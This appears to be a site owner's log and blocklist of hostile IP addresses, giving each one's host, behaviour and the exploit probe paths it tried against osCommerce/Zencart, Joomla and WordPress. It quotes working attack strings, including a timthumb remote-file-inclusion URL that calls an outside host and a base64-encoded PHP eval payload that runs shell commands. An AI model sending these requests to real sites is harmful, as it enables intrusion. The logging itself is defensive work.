82.165.150.228 Hostname: s15440330.onlinehome-server.info
Host: Germany – Karlsruhe 1&1 Internet Ag
Shared hosting web server: 5 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
174.142.104.119 Host: Canada Montreal Iweb Dedicated Cl
Shared hosting web server: 4 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
72.249.126.33 Hostname: loencuentroporti.com
Host: United States – Ochelata Networld Internet Services
Shared hosting web server: 23 websites
Looking for admin exploit
/admin/administrators.php/login.php
216.150.224.199 Hostname: mail1.wansol.net
Host: United States – Royal Oak Advanced Data Systems
Looking for known Joomla Open Flash Chartexploit:
//administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=xxx.php
82.193.109.52 Hostname: 82.193.109.52.ipnet.kiev.ua
Host: Ukraine – Kiev Zat Industrial Media Network
Comment spammer
Bad host
188.40.151.148 Hostname: static.148.151.40.188.clients.your-server.de
Host: Germany – Hamburg Ebla It
Hetzner Online AG
Shared hosting web server: 6 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
85.31.196.160 Hostname: jn478.jn-hebergement.com
Host: France – Marseille Jaguar Network Sas
Shared hosting web server: 7 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
192.73.244.56 Hostname: lvps94-136-55-143.vps.webfusion.co.uk
Host: United Kingdom – Derby Webfusion Internet Solutions
Shared hosting web server: 13 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
37.157.192.169 Hostname: one.zenart.cz
Host: Czech Republic – Hluboka Nad Vltavou Wedos Hosting Services
Shared hosting web server: 50 websites
Looking for known Joomla JCE editor exploit
//images/stories/xfile.gif
151.237.186.7 Host: Sweden – Stockholm Deepak Mehta Fie Registration bot
Bad host: Deepak Mehta Fie
130.185.157.8 Host: United States – Waynesville Deepak Mehta Fie
Web server: 1 website -daunenjackemonclersoutlet.com
Running registration bot
94.126.19.212 Hostname: mignon3.ch-meta.net
Host: Switzerland – Zurich Metanet Ag
Web server: 1 website – exo-fashion.ch
Remote File Inclusion probe / WordPress timthumb RFI exploit:
/wp-content/themes/Aggregate/thumb.php?src=
http: //picasa.com.blackwellbusiness.com/bad.php
111.223.252.93 Hostname: hosting.unpad.ac.id
Host: Indonesia – Bandung Universitas Padjadjaran
Shared hosting web server: 3 websites
Remote File Inclusion probe / WordPress timthumb RFI exploit:
/wp-content/themes/Aggregate/thumb.php?src=
http: //picasa.com.blackwellbusiness.com/bad.php
216.244.71.194 Host: United States – Seattle Private Customer Comment spammer
87.118.124.67 Hostname: ns.km33204-01.keymachine.de
Host: Germany – Erfurt Keyweb Ag
Shared hosting web server: 3 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
70.38.109.89 Hostname: northboundlive.com
Host: Canada – Montreal Northbound Leather
Shared hosting web server: 3 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
151.11.24.39 Host: Italy – Milano Istituto Agronomico Mediterraneo
Shared hosting server -4 websites
Looking for Joomla exploit:
/images/stories/3xp.php
188.3.56.143 Host: Turkey – Istanbul Koc.net Dsl Istanbul Trying to login to WordPress /wp-login.php on Drupal site
Bad host
88.245.165.221 Hostname: 88.245.165.221.dynamic.ttnet.com.tr
Host: Turkey – Kutahya Turk Telekomunikasyon Anonim Sirketi
Looking for admin exploit:
/administrator/index.php
82.165.25.114 Host: Germany – Karlsruhe 1&1 Internet Ag
Shared hosting web server: 10 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
46.119.115.36 Hostname: SOL-FTTB.36.115.119.46.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment spammer
Bad host
82.165.25.35 Hostname: s15925353.onlinehome-server.info
Host: Germany – Karlsruhe 1&1 Internet Ag
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
87.106.191.117 Hostname: s15432125.onlinehome-server.info
Host: Germany – Karlsruhe 1&1 Internet Ag
Shared hosting web server: 41 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
64.235.53.5 Hostname: lasvegas-nv-datacenter.com
Host: United States – Las Vegas Las Vegas Nv Datacenter
Web server: suncoastlearning.net
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
172.245.214.242 Host: United States – Sellersville Aslan Investments Llc
ColoCrossing
Comment spammer
64.145.83.176 Hostname: 83-0ae9378-egi.ultraresponse.net
Host: United States – San Jose Egihosting
Bad registration attempt:
/content/index.php?option=com_user&task=register
&view=register
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
37.59.164.83 Host: France – Roubaix Ovh Systems Bad host
Comment spammer
50.9.184.223 Hostname: 50-9-184-223.los.clearwire-wmx.net
Host: United States – Los Angeles Clear Wireless Llc
Brute force / dictionary attack on admin
/admin/login.php
208.88.6.159 Hostname: corebulk.com
Host: Canada – Toronto Cirrus Tech. Ltd.
Web server: winnerpalace.com , winnerpalace.net
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
85.214.121.79 Hostname: opendots.net
Host: Germany – Berlin Strato Ag
Shared hosting web server: 3 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
94.199.204.15 Hostname: corebulk.com
Host: Izmit Aerotek Bilisim Taahhut Sanayi Ve Ticaret Limited Sirketi
Web server: corebulk.com
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
93.187.201.115 Hostname: mail.sadearge.com
Host: Turkey – Izmir Netdirekt A.s.
Shared hosting web server: 28 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
82.165.138.253 Hostname: s15931981.onlinehome-server.info
Host: Germany – Karlsruhe 1&1 Internet Ag
Shared hosting web server: 5 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
74.208.102.248 Hostname: s15357523.onlinehome-server.com
Host: United States – Wayne 1&1 Internet Inc.
Shared hosting web server: 6 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
163.27.222.195 Host: Taiwan – Taipei Moec Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
82.229.150.170 Hostname: mon75-7-82-229-150-170.fbx.proxad.net
Host: France – Montpellier Proxad/free Sas
Web server – website: smartplaces.biz
81.57.153.144 Hostname: cpy94-1-81-57-153-144.fbx.proxad.net
Host: France – Cepoy Proxad/free Sas
Some kind of bot – Crawled site looking for non-existent urls.
UA: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36 Squider/0.01
This UA is not a genuine browser
94.123.227.51 Host: Turkey – Istanbul Dogan Tv Digital Platform Isletmeciligi A.s Dictionary attacker looking for admin exploit
142.4.209.168 Hostname: ks4003314.ip-142-4-209.net
Host: Canada – Montreal Ovh Hosting Inc.
Looking for WordPress plugin readme.txt files
Looking for vulnerable version of Simple Dropbox Upload Form plugin
151.236.43.41 Hostname: beta.imcconseil.fr
Host: United Kingdom – Maidenhead Simply Transit Ltd
Shared hosting web server: 20 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
85.97.158.40 Hostname: 85.97.158.40.dynamic.ttnet.com.tr
Host: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketis
Brute force / dictionary attack on admin
/admin/login.php
bitrix/admin/index.php
198.211.112.21 Hostname: kruk.skiltech.com
Host: Canada – Toronto Digital Ocean Inc.
Shared hosting web server: 11 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
192.184.37.126 Hostname: unassigned.psychz.net
Host: United States – Walnut Psychz Networks
Comment spammer
Bad host: Psychz Networks
198.245.63.133 Hostname: ns4000804.ip-198-245-63.net
Host: Canada – Montreal Ovh Hosting Inc
Comment spammer
Bad host: Ovh Systems
184.173.243.3 Hostname: atlantic.ourhostingservers.com
Host: United States – Houston Theplanet.com Internet Services Inc.
Shared hosting web server: 465 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
108.171.197.226 Hostname: galaxy.wznoc.com
Host: United States – Los Angeles Webnx Inc.
Shared hosting web server: 894 websites
Looking for known exploit vulnerability
/wp-content/plugins/lazy-seo/lazyseo.php
37.57.25.225 Host: Ukraine – Kharkiv Tov Bank-inform Hacker probing for vulnerabilities
/webalizer/usage_201309.html
/administrator/index.php
203.88.117.217 Hostname: woylie.cbr.hosting-server.com.au
Host: Australia – Braddon Uberglobal Ubrcbrvl
Shared hosting web server: 351 websites
Looking for known exploit vulnerability
/wp-content/plugins/lazy-seo/lazyseo.php
173.208.133.226 Host: United States – Kansas City Wholesale Internet Inc.
Web server: 1 website – yir.cc
Looking for known exploit vulnerability
/wp-content/plugins/user-meta/framework/helper/
92.135.56.63 Hostname: ANantes-654-1-41-63.w92-135.abo.wanadoo.fr
Host: France – Nantes Orange S.a.
Looking for very old (more than 2 yrs) removed lnks.
200.148.94.78 Hostname: 200-148-94-78.dsl.telesp.net.br
Host: Brazil – Sao Paulo Telefonica Brasil S.a
Mail server, dictionary attacker, comment spammer
142.0.134.89 Host: United States – San Jose Vpsbus
PEGTECHINC – PEG TECH INC
Comment spammer
Bad host: PEGTECHINC
82.165.157.236 Hostname: s15752903.onlinehome-server.info
Host: Germany – Karlsruhe 1&1 Internet Ag
Web server: 1 website – urbangreenline.org
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
94.23.63.174 Hostname: ks3097743.kimsufi.com
Host: France – Roubaix Ovh Systems
Comment spammer
Bad host: Ovh Systems
199.15.233.133 Host: United States – Fort Worth Julian Roskilly Comment spammer / Rule breaker
Bad host:
108.59.255.124 Hostname: vps-1051735-4354.manage.myhosting.com
Host: United States – Pittsford Softcom America Inc.
Web server: 1 website – setestdomain.com
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
62.173.123.121 Hostname: unallocated.star.net.uk
Host: United Kingdom – Barnet Vax Ltd
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
88.190.62.117
88.190.62.120
88.190.62.105
Hostname: 88-190-62-117.rev.poneytelecom.eu
Host: France – Paris Dedibox Sas
Comment spammer
Bad host
204.155.149.27 Host: United States – North Richland Hills Dfw Internet Services Inc.
Web server: 1 website – moonsearchtest.com
Mail server
188.143.234.127 Host: Russian Federation – Saint Petersburg Petersburg Internet Network Ltd Comment spammer
Very high threat rating
162.216.4.104 Hostname: 162-216-4-104.static.hvvc.us
Host: United States – Tampa Noc4hosts Inc.
Shared hosting web server: 24 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
Looking for known Joomla exploit:
//images/stories/wp-includes/wp-mails.php?clone
/option=com_jce&task=plugin&plugin=imgmanage
203.183.65.152 Hostname: ns.work-wheels.jp
Host: Japan – Wadax Inc
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
195.137.212.149 Hostname: basicbox15.server-home.net
Host: Germany – Dortmund Markus Bach Betriebs Gmbh
Shared hosting web server: 289 websites
Looking for known exploit vulnerability in WordPress MM Forms Community plugin :
/backwpup-plugin-guide/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php
Bad host
64.207.154.180 Hostname: benchmarkdisplays.com
Host: United States – Culver City Media Temple Inc.
Shared hosting web server: 5 websites
Looking for Joomla JCE editor RFI exploit
//images/stories/3xp.phpv
37.72.190.104 Host: United States – Carolina Deepak Mehta Fie Comment spammer
208.177.76.26 Host: United States – Herndon Xo Communications Comment spammer
Bad host
70.32.104.58 Hostname: sojournchurch.com
Host: United States – Moreno Valley Media Temple Inc
Shared hosting web server: 14 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
86.96.226.87
86.96.226.88
Host: United Arab Emirates – Dubai Emirates Telecommunications Corporation Hacker : Very dangerous IP – BAN IT
Bad host
46.105.165.224 Host: France – Roubaix Ovh Systems Bad host: Roubaix Ovh Systems
193.105.210.30 Host: Ukraine – Rivne Fop Budko Dmutro Pavlovuch Comment spammer
Extremely high threat rating – ban it
122.255.96.164 Host: Malaysia – Kuala Lumpur Packet One Networks (m) Sdn Hacker bot looking for Awstats exploit
97.79.239.37 Hostname: 37.239.79.97.gvodatacenter.com
Host: United States – San Antonio Time Warner Cable Internet Llc
Shared hosting web server: 17 websites
Trying to exploit WordPress admin on Drupal site
Love these IDIOTS who try WordPress exploits on my Drupal sites
87.238.192.99 Hostname: sh2099.evanzo-server.de
Host: Germany – Berlin Evanzo E-commerce Gmbh Infrastructure
Shared hosting web server: 3790 websites
1. Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php2. Looking for WordPress is-human plugin exploit
/wp-content/plugins/is-human/engine.php?action=log-reset&error&eval(base64_decode(JHM9cGhwX3VuYW1lKCk7CmVjaG8gJzxicj4nLiRzOwoKZW
NobyAnPGJyPic7CnBhc3N0aHJ1KGlkKTsK))&type=ih_options()
Bad host
195.144.11.132 Hostname: 195-144-11-132.phpnet.fr
Host: France – Grenoble Phpnet France Sarl
Shared hosting web server: 62 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
216.244.85.234 Host: United States – Seattle Private Customer Comment spammer
Very high threat rating – ban it
198.27.65.184 Hostname: ns4004995.ip-198-27-65.net
Host: Canada – Montreal Ovh Hosting Inc.
Web server: 1 website – iblock.in
Trying to sign in to site with non-existent user name
198.2.213.253 Hostname: United States – San Jose Yu Chen
PEGTECHINC – PEG TECH INC
Comment spammer
Bad host: San Jose Yu Chen
Very high threat rating – ban it
94.142.128.140 Hostname: h-128-140.cssgroup.lv
Host: Latvia – Cesis Sia Css Group
Comment spammer, mail server, dictionary attacker
Very high threat rating – ban it
207.241.237.225
207.241.237.226
207.241.237.229
Hostname: crawl423.us.archive.org
Host: United States – San Francisco Internet Archive
User agents:
Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)
Mozilla/5.0 (compatible; special_archiver/3.1.1 +http://www.archive.org/details/archive.org_bot)
Wayback machine – archive.org spider
Rule breaker – does not read or obey robots.txt
65.99.249.234 Hostname: clara.ftpdns.net
Host: United States – Dallas Realwebhost
Shared hosting web server: 27 websites
Looking for drupal/xmlrpc.php
/content//drupal/xmlrpc.php
Absolutely ridiculous – this spammer’s a moron
88.251.148.143 Turkey – Istanbul Dogan Tv Digital Platform Isletmeciligi A.s Looking for admin exploit
administrator/index.php
Bad host
94.120.69.210 Turkey – Istanbul Dogan Tv Digital Platform Isletmeciligi A.s Dictionary attacker:
Tried to sign in with user name “admin”
Blocked by firewall
144.76.85.241 Hostname: n4g1.007ac9.net
Host: Germany – Berlin Server Block
HETZNER-AS Hetzner Online AG
User agent: Mozilla/5.0 (compatible; SISTRIX Crawler; http: //crawler.sistrix.net/)
Sistrix Crawler
Badly programmed bot
Rule breaker
Resource waster
92.24.135.73 Hostname: host-92-24-135-73.ppp.as43234.net
Host: United Kingdom – Ipswich Opal Telecom Dsl
Looking for wpOnlineStore vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
Using Fake Googlebot agent
77.245.151.239 Hostname: server.noktavis.com
Host: United States – Niobe Niobe Bilisim Teknolojileri Yazilim San. Tic. Ltd. Sti.
Note – This is actually a Turkish IP address
Shared hosting web server: 31 websites
Looking for Joomla JCE editor RFI exploit
//images/stories/0cams.php?rf
/index.php?cid=20&file=imgmanager&option=com_jce&
plugin=imgmanager&task=plugin&version=1576
188.92.77.12 Host: Latvia – Riga Ad Technology Sia Comment spammer – high threat rating
62.109.16.28 Hostname: record.fvds.ru
Host: Russian Federation – Irkutsk Ispsystem Cjsc
Looking for admin exploit
admin/administrators.php/login.php
184.154.124.148 Hostname: host7.server10.vpn999.com
Host: United States – Chicago Singlehop Inc.
Comment spammer
89.200.137.33 Hostname: hughead2.miniserver.com
Host: United Kingdom – Reading Memset Ltd
Shared hosting web server: 19 websites
Looking for Joomla JCE editor RFI exploit
/images/stories/Arab.Indonesia.php?rf
88.235.34.201 Hostname: 88.235.34.201.dynamic.ttnet.com.tr
Host: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Dictionary attacker
Trying to login with user name admin
Bad host
190.95.216.158 Hostname: mail.medikal.com.ec
Host: Poland – Ecuador – Guayaquil Onnet S.a.
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
85.128.142.33 Hostname: akl33.rev.netart.pl
Host: Poland – Warsaw Netart Spolka Akcyjna Spolka Komandytowo-akcyjna
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
190.66.11.58 Hostname: ns4.funandi.edu.co
Host: Colombia – Bogota Colombia Telecomunicaciones S.a. Esp
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
192.99.9.51 Hostname: ns4009405.ip-192-99-9.net
Host: Canada – Montreal Ovh Hosting Inc.
Comment spammer
Bad host
108.61.3.83 Hostname: 108.61.3.83.choopa.net
Host: United States Piscataway Levitan Software
Shared hosting web server: 19 websites
Hacker / bot looking for known exploit in reflex-gallery FileUploader:
/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php
50.2.223.147 Host: United States – Dallas Serverhub Cloud Ovz Dallas Comment spammer – found honeypot trap
37.59.61.39 Hostname: ks3099848.kimsufi.com
Host: France – Roubaix Ovh Systems
Comment spammer – found honeypot trap
Bad host: Roubaix OVH Systems
94.198.160.31 Hostname: 94.198.160.31.static.hosted.by.easyhost.be
Host: Belgium – Gent Easyhost Belgium Network
Shared hosting web server: 43 websites
Trying to exploit WordPress xmlrpc.php
Probable trackback comment spammer
UA: Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)
192.95.16.217 Hostname: ceunico.servergrove.com
Host: Canada – Montreal Ovh
Shared hosting web server: 3 websites – corpsbus.com , dckmembers.com , dividedeye.com
Comment spammer – found honeypot trap
Bad host: OVH Systems
66.135.39.94 Hostname: ceunico.servergrove.com
Host: United States – San Antonio Serverbeach
Shared hosting web server: 11 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.phpKnown hacker user agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2)
Gecko/20100115 Firefox/3.6
89.121.199.171 Host: Romania – Bucharest Romtelecom S.a.
Web server – 1 website: sscbacau.ro
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
137.175.14.33 United States – San Jose China Outcom-urhosts.net
PEGTECHINC – PEG TECH INC
Comment spammer / Bad host
199.15.233.140 Host: United States – Fort Worth Justin Downing Comment spammer
37.59.202.65 Host: Roubaix Ovh Systems Comment spammer / Bad host
188.143.233.39 Host: Russian Federation – Saint Petersburg Petersburg Internet Network Ltd. Comment spammer
192.74.229.65 Host: United States – San Jose Zhang Meng Comment spammer / Bad host
208.177.76.2 Hostname: 208.177.76.9.ptr.us.xo.net
Host: United States – Herndon Xo Communications
Comment spammer / Bad host
110.211.129.120 Host: China – Beijing China Tietong Telecommunications Corporation Looking for various contact forms
/contact.html
/contact.htm
/contact.jsp
/contact.asp
and variations e.g.
/contactus.php
/contact_us.php
and others – DoS type lookups -about 80 a minute
80.72.33.106 Hostname: imperator.imperium.media.pl
Host: Poland – Warsaw Etop Sp. Z O.o.
Shared hosting web server: 55 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
86.122.106.127 Hostname: 86-122-106-127.rdsnet.ro
Host: Romania – Alexandria Rcs & Rds Residential
Comment spammer
91.213.46.145 Host: Spain – Valencia Businet Scp
Shared hosting web server: 55 websites
Attempted admin hack using known exploit:
/admin/administrators.php/login.php
64.151.226.128 Hostname: nl001.equallogicsolutions.com
Host: Canada – Burnaby In2net Network Inc
Shared hosting web server: 6 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
72.55.140.233 Hostname: host.rege.gr
Host: Canada – Montreal Iweb Dedicated Cl
Web server – 1 website: rege.gr
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
94.136.54.181 Hostname: lvps94-136-54-181.vps.webfusion.co.uk
Host: United Kingdom – Derby Webfusion Internet Solutions
Web server – 2 website: crystallight.tv , smearfreewindows.com
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
54.251.61.114 Hostname: ec2-54-251-61-114.ap-southeast-1.compute.amazonaws.com
Host: Singapore Amazon.com Inc.
Web server – 1 website: actinginn.com
Nuisance bot:
Gigabot/3.0 (http: //www.gigablast.com/spider.html)Hacker – Looking for wpOnlineStore / osCommerce / ZenCart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
69.64.58.58 Hostname: colossus914.startdedicated.com
Host: United States – Saint Louis Hosting Solutions International Inc
Web server – 1 website: nideasoft.com
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
166.63.0.70 Hostname: cloudix.com
Host: United States – Columbus Cloudix.com
Web server – 2 website: ahsoti.org , aunimun.org
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
190.95.216.158 Hostname: mail.medikal.com.ec
Host: Ecuador – Guayaquil Onnet S.a.
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
192.254.154.251 Hostname: tri.trikalaola.gr
Host: United States – Salt Lake City Websitewelcome.com
Web server – 1 website: trikalaola.gr
Attempting /osCommerce/Zencart php injection hack
/zcadmin/sqlpatch.php/password_forgotten.php?action=execute
/admin/sqlpatch.php/password_forgotten.php?action=execute
4dm1n/product.php/password_forgotten.php
/extras/curltest.php
Read more about this hack
89.252.107.154 Hostname: culture.natm.ru
Host: Russian Federation – Velikiy Novgorod Novgorod Datacom
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
89.221.250.18 Hostname: www18.aname.net
Host: Sweden – Helsingborg Fsd Internet Tjanster Ab
Shared hosting web server: 366 websites
Attempted admin hack using known exploit
87.238.192.71 Hostname: sh2071.evanzo-server.de
Host: Germany – Berlin Evanzo E-commerce Gmbh Infrastructure
Shared hosting web server: 1395 websites
Hacker:
looking for Joomla JCE Remote File Upload Vulnerability – images/stories/3xp.php
67.23.2.106 Host: United States – Dallas Rackspace Cloud Servers
Web server: 4 websites – demvolctr.com , demvolctr.org , scc-mta.com , scc-mta.org
Hacker: Looking for Joomla JCE editor RFI exploit
142.0.128.24 Host: United States – San Jose Yundc
PEGTECHINC – PEG TECH INC
Web server: 4 junk websites – bjlgis.pw , bjlock.pw , bjlqbe.pw , bjlscg.pw
Comment spammer
Bad host: PEGTECHINC
88.224.29.99 Hostname: 88.224.29.99.dynamic.ttnet.com.tr
Host: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Hackerbot looking for Bitrix exploit
/administrator/index.php
/admin.php
/admin/index.php
/user/
/bitrix/admin/index.php?lang=en
95.51.202.241 Hostname: ohw241.internetdsl.tpnet.pl
Host: Poland – Kamien Pomorski Static Ip
Dictionary / Brute force login attacker
69.164.111.198 Host: United States – Alpharetta Secure Computing Corp. … Fka Site scraper
91.203.4.49 Host: Ukraine – Kiev Denis Pavlovich Semenyuk
Shared hosting web server: 9 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
68.171.208.82 Hostname: tsdapps.net
Host: United States – Waterville Acenet Inc.
Shared hosting web server: 170 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
80.53.255.42 Hostname: main.anchor.com.pl
Host: Poland – Warsaw Static Ip
Shared hosting web server: 4 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
Malicious user agent: libwww-perl/5.813
89.33.97.30 Hostname: user-89.33.97.30.mitnet.ro
Host: Romania – Bucharest Sc Millennium It Srl
Shared hosting web server: 54 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
188.165.137.225 Host: France – Roubaix Ovh Systems Trying to login/register
Bad host: Roubaix Ovh Systems
184.22.211.146 Hostname: abcd-burst2.yasni.de
Host: United States – Ohio Network Operations Center Inc
Trying to hotlink to downloads
190.147.27.202 Hostname: Static-IP-cr19014727202.cable.net.co
Host: Colombia – Pasto Telmex Colombia S.a.
Comment spammer
Tried to add content – /node/add
88.208.193.145 Hostname: server88-208-193-145.live-servers.net
Host: United Kingdom – Gloucester Fast Hosts Ltd
Shared hosting web server: 38 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
195.186.81.74 Hostname: 74-81-186-195.bluewin.ch
Host: Switzerland – Zurich Bluewin Is An Internet Service Provider In Ch.
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
174.36.137.189 Hostname: 174.36.137.189-static.reverse.softlayer.com
United States – Seattle Softlayer Technologies Inc.
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
